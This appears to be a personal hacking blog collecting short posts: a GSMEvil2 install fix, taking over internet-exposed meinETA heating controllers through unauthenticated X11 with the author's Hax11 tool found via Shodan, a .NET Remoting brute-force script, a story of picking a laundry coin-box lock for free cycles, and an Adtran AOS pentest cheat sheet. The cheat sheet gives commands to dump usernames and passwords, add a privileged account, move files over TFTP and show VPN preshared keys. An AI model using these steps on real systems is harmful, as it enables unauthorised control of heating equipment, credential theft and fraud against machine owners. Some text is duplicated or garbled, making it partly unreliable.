So MOST of the instructions on GSMEvil2's github work fine with the exception of the pip guidance. Here is what I had to use to get it working:
pip3 install pyshark flask flask_socketio==4.3.2 pysqlite3
Yeah its a short post, Deal with it :P
"Lets break it!"
All info in this blog is for educational use only!
So MOST of the instructions on GSMEvil2's github work fine with the exception of the pip guidance. Here is what I had to use to get it working:
pip3 install pyshark flask flask_socketio==4.3.2 pysqlite3
Yeah its a short post, Deal with it :P
meinETA is a heating control system that can be accessed remotely via a password protected portal, however since it uses X11 to expose the GUI to the user, if you can get the IP of the meinETA system this portal can be bypassed and you can manipulate the system directly with Hax11 as seen below.
The ETA site says this about meinETA:
meinETA: the free internet platform
If your heating boiler is connected to the internet, you can see and change all heating settings on your mobile, tablet or PC. So you always have a handle on your heating, wherever you are! When you login to www.meinETA.at, you see the touchscreen as if you were standing right in front of the boiler!
This means that with Hax11 you have full control of the system, without the need for the portal, just needing the systems IP. This would seem to be a big hurdal, but a few minutes on shodan and you can track systems down and be in full control with just a few keystrokes and clicks of the mouse. There doesn't seem to be any sort of authentication on the GUI, not even a pin code so there is nothing stopping you once you locate one.
More on ETA
Get Hax11 HERE
I have updated Hax11 to connect to non-default display ports. The previous version only allowed connecting to display 0 "port 6000", but now you can connect to any a system has available.
Example:
If you want to connect to display 1 "port 6001" use this command:
python hax11.py ip.addr.here 1
If you want to connect to display 0 use the old command style:
python hax11.py ip.addr.here
You can connect to display 1, 2, 3, and so on. I know it seems like a small change, but it doubles or more your attack surface. So while the change is small, the impact is big.
Get it HERE
Enjoy!
I wanted to hack up something to make it less painful, so I searched the web for common object names, then searched github for MS .NET Remoting apps and added the names they were using as well. Then coded up a little bash script that uses the ExploitRemotingService tool and loops through the list I compiled. Testing so far shows it works like a charm with a few bugs.
Still I thought it could be a nice tool to have in your bag of holding so I am made it available on github. I hope someone gets use of it.
Usage: ./bfNET ip.addr port
Get it here
A friend of mine was telling me about how her landlord keeps raising the price on the washer and dryer in her apartment complex. She knew I liked playin with tech and machines so she asked if we could figure out how to get the coins out. I explained that would be a bad idea as it would be clear something was up if the machines never had money in them on collection day, but maybe we could figure out a way to get free use of them, which would be harder to detect. A door with a lock on top of the housing for the coin mechanism had a tubal lock as seen below:
So I busted out my picks and got the door to open. Here is what I found when I bypassed the lock:
As you can see it's just a few wires, I figured this was our access point to free cycles. You can see the white bracket to connect the coin functions to the machine as seen below:
Below is some junk for AOS you might find useful in a pentest.
CLI cmds:
Turns on privileged commands "all below commands assume enable command executed with success":
enable
Disable logging for session
no events all
From here for easy hacking and if the system is in a DMZ, hanging off the inet or the proper ports are exposed, just enable the http server and continue from there.
configure terminal
http server 80
If you cant access the http server the cmds below should help get some info out of the system.
Lists users and PWs
show running-config | include username #displays usernames and passwords.
Add new user with op privs
configure terminal
username operator privilege 10 password unencrypted passwd1
List IPs
show ip interfaces
Download a file to target system *after running cmd below you will be promoted for more data and you will need an tftp server running that is accessible by the target"
copy tftp flash "or cflash"
Download file from target to your system
copy flash tftp
View vpns name and preshared keys
show crypto ike remote-id
View vpns configs *below cmd should give all client configs, you add the name at end to view only that names config
show crypto ike congratulation pool
View vpns policy
show crypto ike policy
TCL script to set up a VPN in the AOS CLI with walk through:
https://supportcommunity.adtran.com/jmaxz83287/attachments/jmaxz83287/nv-aos/182/1/Configuring%20Main%20Mode%20and%20Remote%20Client%20VPN%20in%20the%20AOS%20CLI.pdf
AOS CLI reference:
https://supportcommunity.adtran.com/jmaxz83287/attachments/jmaxz83287/nv-aos/428/7/AOS%20R13.12.0%20Command%20Reference%20Guide.pdf
If you have anything to add please hit me up and let me know, i would love to see this grow!
Labels: adtran, aos, cheatsheet, pentest